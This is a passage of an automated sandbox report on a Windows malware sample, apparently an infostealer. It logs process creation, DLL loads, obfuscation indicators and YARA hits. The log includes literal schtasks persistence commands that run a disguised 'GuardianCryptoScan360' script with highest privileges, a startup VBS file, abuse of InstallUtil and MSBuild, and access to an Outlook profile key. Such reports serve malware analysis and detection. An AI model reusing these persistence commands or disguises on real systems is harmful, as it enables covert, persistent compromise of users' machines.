                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com" "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U"
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1144
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: napinsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wshbth.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winrnr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\00000123.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Users\user\Desktop\00000123.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\00000123.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 00000123.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 00000123.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                  Source: 00000123.exe | Static file information: File size 3520000 > 1048576
                  Source: 00000123.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x35ac00
                  Source: 00000123.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, R7pp1CEv5h7lSYql4h.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 00000123.exe, -.cs | .Net Code: _E001
                  Source: 00000123.exe, -.cs | .Net Code: _E013
                  Source: 00000123.exe, -.cs | .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 00000123.exe, Qlvbgtnnqlr.cs | .Net Code: Ymkcbcetoao System.AppDomain.Load(byte[])
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, ListDecorator.cs | .Net Code: Read
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
                  Source: Yara match | File source: 37.2.MSBuild.exe.5a10000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.00000123.exe.8160000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.00000123.exe.8160000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.2569244195.0000000008160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000025.00000002.2849642219.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 00000123.exe PID: 7248, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 1396, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_004062FC
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A1B9 push esp; retn 0001h0_2_01C4A1BA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4815B push edi; ret 0_2_01C4815E
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A169 push edx; retn 0001h0_2_01C4A16A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A5C0 push ebp; retn 0001h0_2_01C4A5C2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A529 push ebp; retn 0001h0_2_01C4A52A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C424D9 push es; retn 0001h0_2_01C424DA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C43478 push cs; retn 0001h0_2_01C4347A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4B478 pushad ; retn 0001h0_2_01C4B47A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A7D1 push edi; retn 0001h0_2_01C4A7D2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A789 push edi; retn 0001h0_2_01C4A78A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A738 push esi; retn 0001h0_2_01C4A73A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A6A1 push esi; retn 0001h0_2_01C4A6A2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A658 push esi; retn 0001h0_2_01C4A65A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA9155 push ds; retf 0_2_01CA9156
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA73D0 push esp; ret 0_2_01CA73D2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA73F8 push esp; ret 0_2_01CA73FA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7397 push esp; ret 0_2_01CA739A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA73A1 push esp; ret 0_2_01CA73A2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7379 push esp; ret 0_2_01CA737A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7370 push esp; ret 0_2_01CA7372
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7301 push esp; ret 0_2_01CA7302
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CAB29F push es; ret 0_2_01CAB2BF
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CAE260 push ds; retf 0_2_01CAE26E
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA75A8 push esi; ret 0_2_01CA75AA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA75A1 push edi; ret 0_2_01CA75A2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7561 push esi; ret 0_2_01CA7562
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA94AC push ds; retf 0_2_01CA94AE
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA74BF push ebp; ret 0_2_01CA74C2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7429 push ebp; ret 0_2_01CA742A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7431 push ebp; ret 0_2_01CA7432
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CAE7D4 pushfd ; ret 0_2_01CAE992
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, NX3oNh2jjguTqMC0C4e.csHigh entropy of concatenated method names: 'BmC2KpjYR4', 'hqt2CXO0eC', 'sMi2GjGrI1', 'iuV2oEyR3D', 'cA92I1TUsv', 'eGo2v3rsSe', 'lay28Mfabm', 'eTX2pEPo64', 'WjW2Wod7Jm', 'KGd2HE1rLo'
